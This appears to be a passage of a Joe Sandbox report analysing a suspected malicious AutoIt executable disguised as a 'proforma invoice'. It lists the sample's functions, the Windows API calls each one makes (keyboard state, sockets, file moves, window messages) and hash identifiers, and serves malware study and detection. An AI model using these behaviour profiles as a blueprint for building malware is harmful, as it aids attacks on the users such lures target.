                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                  • String ID:
                  • API String ID: 2829977744-0
                  • Opcode ID: 8e8101046a96f76e49f51ed6cc31997f2f776c02e9bd858d4d7f487bebd6f68e
                  • Instruction ID: 455793d82890471944ff2b22ad155aec0643b6b575f646fe9fb12ea883ea64a7
                  • Opcode Fuzzy Hash: 8e8101046a96f76e49f51ed6cc31997f2f776c02e9bd858d4d7f487bebd6f68e
                  • Instruction Fuzzy Hash: 0D91B572E002A69EDF208FB6CD81EEE7BB5AF49750F184659E812E7181DB35DD40CB60
                  Function 00B24523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Variant$ClearInit
                  • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                  • API String ID: 2610073882-625585964
                  • Opcode ID: aaf4d71bfe4d2cd556fee68ad1e56b23c5bc57a8e822f2f9eadeacd7de491384
                  • Instruction ID: cbb9e1edf6777ec79402e0289d338279e369cb6f8bb1618c77b1430283dfa0de
                  • Opcode Fuzzy Hash: aaf4d71bfe4d2cd556fee68ad1e56b23c5bc57a8e822f2f9eadeacd7de491384
                  • Instruction Fuzzy Hash: E2917171A00225ABDF20CFA4D884FAEBBF8EF46714F108599F519AB291D7709D45CFA0
                  Function 00B11187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                  Download Yara Rule
                  APIs
                  • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 00B1125C
                  • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00B11284
                  • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 00B112A8
                  • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00B112D8
                  • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00B1135F
                  • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00B113C4
                  • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00B11430
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ArraySafe$Data$Access$UnaccessVartype
                  • String ID:
                  • API String ID: 2550207440-0
                  • Opcode ID: 48411ac9c3d499fd0ed32ecf771c09c969b938fca5f41fe8e5106cc3e15f61cd
                  • Instruction ID: 851aa296d78ee741550d45d0284e27618ec102de903c174718b2a80b30412379
                  • Opcode Fuzzy Hash: 48411ac9c3d499fd0ed32ecf771c09c969b938fca5f41fe8e5106cc3e15f61cd
                  • Instruction Fuzzy Hash: A991EF71A00219AFDB00DFA8D884BFEB7F5FF45714F6448A9E600E7291D774A981CB90
                  Function 00AB948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ObjectSelect$BeginCreatePath
                  • String ID:
                  • API String ID: 3225163088-0
                  • Opcode ID: 7322e70888a30633045cb745656fe2577fe4c70e4027653d2e6427e255633a59
                  • Instruction ID: e6f6722f8762a45557504a901515b8085739183273e059b8a5eac7be9581b4fe
                  • Opcode Fuzzy Hash: 7322e70888a30633045cb745656fe2577fe4c70e4027653d2e6427e255633a59
                  • Instruction Fuzzy Hash: AB912671D40219EFCB14CFA9CD84AEEBBB8FF49320F248155E615B7252D774AA41CB60
                  Function 00B23947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                  Download Yara Rule
                  APIs
                  • VariantInit.OLEAUT32(?), ref: 00B2396B
                  • CharUpperBuffW.USER32(?,?), ref: 00B23A7A
                  • _wcslen.LIBCMT ref: 00B23A8A
                  • VariantClear.OLEAUT32(?), ref: 00B23C1F
                    • Part of subcall function 00B10CDF: VariantInit.OLEAUT32(00000000), ref: 00B10D1F
                    • Part of subcall function 00B10CDF: VariantCopy.OLEAUT32(?,?), ref: 00B10D28
                    • Part of subcall function 00B10CDF: VariantClear.OLEAUT32(?), ref: 00B10D34
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                  • String ID: AUTOIT.ERROR$Incorrect Parameter format
                  • API String ID: 4137639002-1221869570
                  • Opcode ID: 391cb92be5df232133795e481024a3f618f2a95c595026f87bf517acd9c66b2e
                  • Instruction ID: c698cdb931498e128b36d3608857dab85f8e59ddfc42cd261e6c902d8e529e4d
                  • Opcode Fuzzy Hash: 391cb92be5df232133795e481024a3f618f2a95c595026f87bf517acd9c66b2e
                  • Instruction Fuzzy Hash: D89179746083119FC700EF24D58496ABBE4FF89714F1489ADF88A9B351DB34EE45CB92
                  Function 00B24BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00B0000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00AFFF41,80070057,?,?,?,00B0035E), ref: 00B0002B
                    • Part of subcall function 00B0000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00AFFF41,80070057,?,?), ref: 00B00046
                    • Part of subcall function 00B0000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00AFFF41,80070057,?,?), ref: 00B00054
                    • Part of subcall function 00B0000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00AFFF41,80070057,?), ref: 00B00064
                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00B24C51
                  • _wcslen.LIBCMT ref: 00B24D59
                  • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00B24DCF
                  • CoTaskMemFree.OLE32(?), ref: 00B24DDA
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                  • String ID: NULL Pointer assignment
                  • API String ID: 614568839-2785691316
                  • Opcode ID: 343fe58a6b7e1b7679ddc21cd76f373896007cf069f2444e09077500a51707d0
                  • Instruction ID: dfb54bfc02b64c30e874dea6c2f686290c6f6b778957d43a4d23e75784b59d06
                  • Opcode Fuzzy Hash: 343fe58a6b7e1b7679ddc21cd76f373896007cf069f2444e09077500a51707d0
                  • Instruction Fuzzy Hash: 1C910871D002299FDF14DFA4D891AEEBBB9FF09310F1085A9E519A7291DB349E44CF60
                  Function 00B320FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                  Download Yara Rule
                  APIs
                  • GetMenu.USER32(?), ref: 00B32183
                  • GetMenuItemCount.USER32(00000000), ref: 00B321B5
                  • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00B321DD
                  • _wcslen.LIBCMT ref: 00B32213
                  • GetMenuItemID.USER32(?,?), ref: 00B3224D
                  • GetSubMenu.USER32(?,?), ref: 00B3225B
                    • Part of subcall function 00B03A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B03A57
                    • Part of subcall function 00B03A3D: GetCurrentThreadId.KERNEL32 ref: 00B03A5E
                    • Part of subcall function 00B03A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00B025B3), ref: 00B03A65
                  • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00B322E3
                    • Part of subcall function 00B0E97B: Sleep.KERNEL32 ref: 00B0E9F3
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                  • String ID:
                  • API String ID: 4196846111-0
                  • Opcode ID: 8ce270f3f63adfb7e71a9cfdd9df5c1e1dcbf066b1bb98e3bf29ca87e1c305cc
                  • Instruction ID: 7b458a94339b3426a987cdba00cceea0aabdda17772410e0c6fa498edff7b749
                  • Opcode Fuzzy Hash: 8ce270f3f63adfb7e71a9cfdd9df5c1e1dcbf066b1bb98e3bf29ca87e1c305cc
                  • Instruction Fuzzy Hash: D4715D75A00215AFCB10DFA4CD85AAEBBF5EF49310F248499E916BB351DB34ED418B90
                  Function 00B37E9E Relevance: 10.7, APIs: 7, Instructions: 193windowCOMMON
                  Download Yara Rule
                  APIs
                  • IsWindow.USER32(014F6318), ref: 00B37F37
                  • IsWindowEnabled.USER32(014F6318), ref: 00B37F43
                  • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00B3801E
                  • SendMessageW.USER32(014F6318,000000B0,?,?), ref: 00B38051
                  • IsDlgButtonChecked.USER32(?,?), ref: 00B38089
                  • GetWindowLongW.USER32(014F6318,000000EC), ref: 00B380AB
                  • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00B380C3
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                  • String ID:
                  • API String ID: 4072528602-0
                  • Opcode ID: 10ce3e6a9e96b4672286f4c52e456b3a756d55f391169bfdab1997542f77d809
                  • Instruction ID: 14f4caca54454e20e8a72612644b4ffa47d74e11f7d1b1f6d44f150d5c2e42e9
                  • Opcode Fuzzy Hash: 10ce3e6a9e96b4672286f4c52e456b3a756d55f391169bfdab1997542f77d809
                  • Instruction Fuzzy Hash: B771ADB4648244AFEB359F68C884FAABBF9FF09300F244499F94597261CF31A845CB60
                  Function 00B0AEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON
                  Download Yara Rule
                  APIs
                  • GetParent.USER32(?), ref: 00B0AEF9
                  • GetKeyboardState.USER32(?), ref: 00B0AF0E
                  • SetKeyboardState.USER32(?), ref: 00B0AF6F
                  • PostMessageW.USER32(?,00000101,00000010,?), ref: 00B0AF9D
                  • PostMessageW.USER32(?,00000101,00000011,?), ref: 00B0AFBC
                  • PostMessageW.USER32(?,00000101,00000012,?), ref: 00B0AFFD
                  • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00B0B020
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: MessagePost$KeyboardState$Parent
                  • String ID:
                  • API String ID: 87235514-0
                  • Opcode ID: a90b80bb5d7a64d95125be7dad75a0373d2312e507836846b6cc53876ee0851e
                  • Instruction ID: ca9d65e746198ee2b6991838d889173d8200c8062a45f5b32730b2be270fa5c2
                  • Opcode Fuzzy Hash: a90b80bb5d7a64d95125be7dad75a0373d2312e507836846b6cc53876ee0851e
                  • Instruction Fuzzy Hash: A15191A1A047D63DFB368334CC45BBABEE99B06304F0889C9E1D9968C2D799ACC4D751
                  Function 00B0ACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON
                  Download Yara Rule
                  APIs
                  • GetParent.USER32(00000000), ref: 00B0AD19
                  • GetKeyboardState.USER32(?), ref: 00B0AD2E
                  • SetKeyboardState.USER32(?), ref: 00B0AD8F
                  • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00B0ADBB
                  • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00B0ADD8
                  • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00B0AE17
                  • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00B0AE38
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: MessagePost$KeyboardState$Parent
                  • String ID:
                  • API String ID: 87235514-0
                  • Opcode ID: 8c9ab3a60bc8eae247920d78df2a905f03f103eea1207cb11db81f739760cdab
                  • Instruction ID: 5272706eb954ee66564b29b57b2f41506da94b43914ae05ed5de94dc82b8370b
                  • Opcode Fuzzy Hash: 8c9ab3a60bc8eae247920d78df2a905f03f103eea1207cb11db81f739760cdab
                  • Instruction Fuzzy Hash: 4051F5A15047D53DFB338334CC95BBABEE8AB46300F1889D9E1D5568C3D694EC88D762
                  Function 00AD542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • GetConsoleCP.KERNEL32(00AE3CD6,?,?,?,?,?,?,?,?,00AD5BA3,?,?,00AE3CD6,?,?), ref: 00AD5470
                  • __fassign.LIBCMT ref: 00AD54EB
                  • __fassign.LIBCMT ref: 00AD5506
                  • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00AE3CD6,00000005,00000000,00000000), ref: 00AD552C
                  • WriteFile.KERNEL32(?,00AE3CD6,00000000,00AD5BA3,00000000,?,?,?,?,?,?,?,?,?,00AD5BA3,?), ref: 00AD554B
                  • WriteFile.KERNEL32(?,?,00000001,00AD5BA3,00000000,?,?,?,?,?,?,?,?,?,00AD5BA3,?), ref: 00AD5584
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                  • String ID:
                  • API String ID: 1324828854-0
                  • Opcode ID: 6b85b9d1568926d6c049c18a6998ca5667dab916dd3d6797f8005f3abbcb22ee
                  • Instruction ID: 2b8ec10df840b18c6e83db769abb81dbdb34fc9aafcc9a411c4e5b9fd1bfb3e8
                  • Opcode Fuzzy Hash: 6b85b9d1568926d6c049c18a6998ca5667dab916dd3d6797f8005f3abbcb22ee
                  • Instruction Fuzzy Hash: 1C519FB1E00649AFDB11CFA8E845AEEBBF9EF09300F14411BE556E7391D6309A81CB61
                  Function 00AC2D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                  Download Yara Rule
                  APIs
                  • _ValidateLocalCookies.LIBCMT ref: 00AC2D4B
                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00AC2D53
                  • _ValidateLocalCookies.LIBCMT ref: 00AC2DE1
                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00AC2E0C
                  • _ValidateLocalCookies.LIBCMT ref: 00AC2E61
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                  • String ID: csm
                  • API String ID: 1170836740-1018135373
                  • Opcode ID: 2c91d2d525397b86a1af2f51c1f29aa13dab6b7599ba2006369ea66dbe38569e
                  • Instruction ID: dc9e79ef6517f70d5ea39cc0ba616b5d3837b77291360a4ea2becd64bb11cf96
                  • Opcode Fuzzy Hash: 2c91d2d525397b86a1af2f51c1f29aa13dab6b7599ba2006369ea66dbe38569e
                  • Instruction Fuzzy Hash: F441B034A00209ABCF10DF68C845FAEBBB5BF44324F168159E815AB392DB31AA01CBD0
                  Function 00B210B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00B2304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00B2307A
                    • Part of subcall function 00B2304E: _wcslen.LIBCMT ref: 00B2309B
                  • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00B21112
                  • WSAGetLastError.WSOCK32 ref: 00B21121
                  • WSAGetLastError.WSOCK32 ref: 00B211C9
                  • closesocket.WSOCK32(00000000), ref: 00B211F9
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                  • String ID:
                  • API String ID: 2675159561-0
                  • Opcode ID: fd3b2ad505e4fc692fb4c375b487c502e4581f86915e2230f9d4df602cfa72ee
                  • Instruction ID: f22154e089e2441bfb80bae9ceb0df126cf21d90890ab901377dadaf6938e24d
                  • Opcode Fuzzy Hash: fd3b2ad505e4fc692fb4c375b487c502e4581f86915e2230f9d4df602cfa72ee
                  • Instruction Fuzzy Hash: 07410931600214AFDB109F58D885BAEBBE9FF45325F148599FD09AB291C770EE41CBE1
                  Function 00B0CF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00B0DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00B0CF22,?), ref: 00B0DDFD
                    • Part of subcall function 00B0DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00B0CF22,?), ref: 00B0DE16
                  • lstrcmpiW.KERNEL32(?,?), ref: 00B0CF45
                  • MoveFileW.KERNEL32(?,?), ref: 00B0CF7F
                  • _wcslen.LIBCMT ref: 00B0D005
                  • _wcslen.LIBCMT ref: 00B0D01B
                  • SHFileOperationW.SHELL32(?), ref: 00B0D061
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                  • String ID: \*.*
                  • API String ID: 3164238972-1173974218
                  • Opcode ID: aba80addeb87627a7e0834651cf7b13fc9f0b361f3e801e5659ef7d7c4c8ecaf
                  • Instruction ID: 2eb46657a5b075a1b86ea6c79e2f578db0dfb1cb7d70543c583ca6bdbcd1636c
                  • Opcode Fuzzy Hash: aba80addeb87627a7e0834651cf7b13fc9f0b361f3e801e5659ef7d7c4c8ecaf
                  • Instruction Fuzzy Hash: 824117719452195EDF12EFA4D981EDE7BF9EF48380F1001E6E509E7181EF34A648CB51
                  Function 00B32DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                  Download Yara Rule
                  APIs
                  • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00B32E1C
                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00B32E4F
                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00B32E84
                  • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00B32EB6
                  • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00B32EE0
                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00B32EF1
                  • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00B32F0B
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: LongWindow$MessageSend
                  • String ID:
                  • API String ID: 2178440468-0
                  • Opcode ID: 5f1b00fe8916535844a84c7d449041095f867f2ef78b1d08b3096b7a7c20e4ce
                  • Instruction ID: 2581fe25b7047acc6174c5a1830cae6b1d7fff54fe3ebc7754d14c6b8d4b31cd
                  • Opcode Fuzzy Hash: 5f1b00fe8916535844a84c7d449041095f867f2ef78b1d08b3096b7a7c20e4ce
                  • Instruction Fuzzy Hash: 90310635604260AFDB21CF5CDC86F6937E1FB9A710F2501A4FA049F2B1CB71A881DB51
                  Function 00B07726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                  Download Yara Rule
                  APIs
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B07769
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B0778F
                  • SysAllocString.OLEAUT32(00000000), ref: 00B07792
                  • SysAllocString.OLEAUT32(?), ref: 00B077B0
                  • SysFreeString.OLEAUT32(?), ref: 00B077B9
                  • StringFromGUID2.OLE32(?,?,00000028), ref: 00B077DE
                  • SysAllocString.OLEAUT32(?), ref: 00B077EC
